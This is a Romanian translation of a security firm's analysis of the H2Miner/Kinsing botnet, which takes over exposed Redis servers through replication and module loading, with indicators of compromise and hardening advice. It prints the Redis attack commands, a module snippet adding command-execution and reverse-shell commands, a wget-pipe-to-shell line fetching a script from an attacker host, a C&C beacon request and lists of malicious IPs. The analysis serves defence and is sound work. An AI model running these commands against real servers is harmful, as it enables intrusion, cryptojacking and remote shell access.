Cu o zi în urmă, unul dintre serverele proiectului meu a fost atacat de un vierme similar. În căutarea unui răspuns la întrebarea „ce a fost asta?” Am găsit un articol grozav al echipei Alibaba Cloud Security. Deoarece nu am găsit acest articol pe Habré, am decis să-l traduc special pentru tine <3
Intrare
Recent, echipa de securitate a Alibaba Cloud a descoperit un focar brusc de H2Miner. Acest tip de vierme rău intenționat folosește lipsa de autorizare sau parole slabe pentru Redis ca gateway-uri către sistemele dvs., după care își sincronizează propriul modul rău intenționat cu slave prin sincronizare master-slave și în final descarcă acest modul rău intenționat pe mașina atacată și execută malware. instrucțiuni.
În trecut, atacurile asupra sistemelor dvs. erau efectuate în principal folosind o metodă care implica sarcini programate sau chei SSH care au fost scrise pe computer după ce atacatorul s-a conectat la Redis. Din fericire, această metodă nu poate fi folosită des din cauza problemelor cu controlul permisiunilor sau din cauza diferitelor versiuni de sistem. Cu toate acestea, această metodă de încărcare a unui modul rău intenționat poate executa direct comenzile atacatorului sau poate obține acces la shell, ceea ce este periculos pentru sistemul dumneavoastră.
Datorită numărului mare de servere Redis găzduite pe Internet (aproape 1 milion), echipa de securitate a Alibaba Cloud, ca o reamintire prietenoasă, recomandă utilizatorilor să nu distribuie Redis online și să verifice în mod regulat puterea parolelor lor și dacă acestea sunt compromise. selecție rapidă.
H2Miner
H2Miner este o rețea botnet pentru minerit pentru sisteme bazate pe Linux, care vă poate invada sistemul într-o varietate de moduri, inclusiv lipsa autorizației în vulnerabilitățile Hadoop yarn, Docker și Redis Redis remote command execution (RCE). O rețea bot funcționează prin descărcarea de scripturi rău intenționate și programe malware pentru a vă extrage datele, a extinde atacul pe orizontală și a menține comunicațiile de comandă și control (C&C).
Redis RCE
Cunoștințele despre acest subiect au fost împărtășite de Pavel Toporkov la ZeroNights 2018. După versiunea 4.0, Redis acceptă o funcție de încărcare a plug-in-urilor care oferă utilizatorilor posibilitatea de a încărca astfel încât fișierele compilate cu C în Redis să execute anumite comenzi Redis. Această funcție, deși utilă, conține o vulnerabilitate în care, în modul master-slave, fișierele pot fi sincronizate cu slave prin modul fullresync. Acesta poate fi folosit de un atacator pentru a transfera fișiere rău intenționate. După ce transferul este finalizat, atacatorii încarcă modulul pe instanța Redis atacată și execută orice comandă.
Analiza viermilor malware
Recent, echipa de securitate Alibaba Cloud a descoperit că dimensiunea grupului de mineri rău intenționați H2Miner a crescut brusc dramatic. Conform analizei, procesul general de producere a atacului este următorul:
H2Miner folosește RCE Redis pentru un atac cu drepturi depline. Atacatorii atacă mai întâi serverele Redis neprotejate sau serverele cu parole slabe.
Apoi folosesc comanda config set dbfilename red2.so pentru a schimba numele fișierului. După aceasta, atacatorii execută comanda slaveof pentru a seta adresa gazdei de replicare master-slave.
Când instanța Redis atacată stabilește o conexiune master-slave cu Redis rău intenționat care este deținut de atacator, atacatorul trimite modulul infectat folosind comanda fullresync pentru a sincroniza fișierele. Fișierul red2.so va fi apoi descărcat pe mașina atacată. Atacatorii folosesc apoi modulul de încărcare ./red2.so pentru a încărca acest fișier so. Modulul poate executa comenzi de la un atacator sau poate iniția o conexiune inversă (backdoor) pentru a obține acces la mașina atacată.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
După executarea unei comenzi rău intenționate, cum ar fi / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, atacatorul va reseta numele fișierului de rezervă și va descărca modulul de sistem pentru a curăța urmele. Cu toate acestea, fișierul red2.so va rămâne în continuare pe mașina atacată. Utilizatorii sunt sfătuiți să acorde atenție prezenței unui astfel de fișier suspect în folderul instanței lor Redis.
Pe lângă uciderea unor procese rău intenționate pentru a fura resurse, atacatorul a urmat un script rău intenționat prin descărcarea și executarea fișierelor binare rău intenționate pentru . Aceasta înseamnă că numele procesului sau numele directorului care conține kinsing pe gazdă poate indica faptul că acea mașină a fost infectată de acest virus.
Conform rezultatelor ingineriei inverse, malware-ul îndeplinește în principal următoarele funcții:
- Încărcarea fișierelor și executarea acestora
- Minerit
- Menținerea comunicării C&C și executarea comenzilor atacatorului
Utilizați masscan pentru scanarea externă pentru a vă extinde influența. În plus, adresa IP a serverului C&C este codificată în program, iar gazda atacată va comunica cu serverul de comunicații C&C folosind cereri HTTP, unde informațiile zombie (server compromis) sunt identificate în antetul HTTP.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Alte metode de atac
Adrese și link-uri folosite de vierme
/ înrudirea
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
consiliu
În primul rând, Redis nu ar trebui să fie accesibil de pe Internet și ar trebui protejat cu o parolă puternică. De asemenea, este important ca clienții să verifice dacă nu există niciun fișier red2.so în directorul Redis și că nu există „kinsing” în numele fișierului/procesului de pe gazdă.
Sursa: www.habr.com